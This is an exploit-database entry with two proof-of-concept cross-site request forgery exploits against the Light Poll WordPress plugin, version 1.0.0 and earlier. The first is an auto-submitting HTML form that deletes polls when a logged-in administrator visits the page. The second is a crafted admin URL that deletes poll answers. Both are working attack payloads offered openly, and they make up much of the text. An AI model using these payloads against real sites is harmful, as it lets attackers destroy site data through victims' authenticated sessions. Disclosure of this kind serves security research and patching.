## https://sploitus.com/exploit?id=1337DAY-ID-39716
# Exploit Title: Light Poll <= 1.0.0 - Polls Deletion via CSRF
# Exploit Author: Vuln Seeker Cybersecurity Team
# Vendor Homepage: https://wordpress.org/plugins/light-poll/
# Version: <=1.0.0
# Tested on: Firefox
# Contact me: [email protected]
Description
The plugin does not have CSRF checks when deleting polls, which could allow
attackers to make logged in users perform such action via a CSRF attack
Proof of Concept
<html>
<body>
<form action="http://localhost/wp-admin/admin.php">
<input type="hidden" name="page" value="lp_settings" />
<input type="hidden" name="task" value="remove" />
<input type="hidden" name="id" value="1" />
<input type="submit" value="Submit request" />
</form>
<script>
history.pushState('', '', '/');
document.forms[0].submit();
</script>
</body>
</html>
Reference:
https://wpscan.com/vulnerability/d598eabd-a87a-4e3e-be46-a5c5cc3f130e/
# Exploit Title: Light Poll <= 1.0.0 - Poll Answers Deletion via CSRF
# Date: 05-04-2024
# Exploit Author: Vuln Seeker Cybersecurity Team
# Vendor Homepage: https://wordpress.org/plugins/light-poll/
# Version: <=1.0.0
# Tested on: Firefox
# Contact me: [email protected]
Description
The plugin does not have CSRF checks in some places, which could allow
attackers to make logged in users perform unwanted actions via CSRF attacks
Proof of Concept
Where <<POLL_ID>> and <<ANSWER_ID>> are valid:
https://example.com/wp-admin/admin.php?page=poll_settings&task=remove_answer&id=
<<POLL_ID>>&answer_id=<<ANSWER_ID>>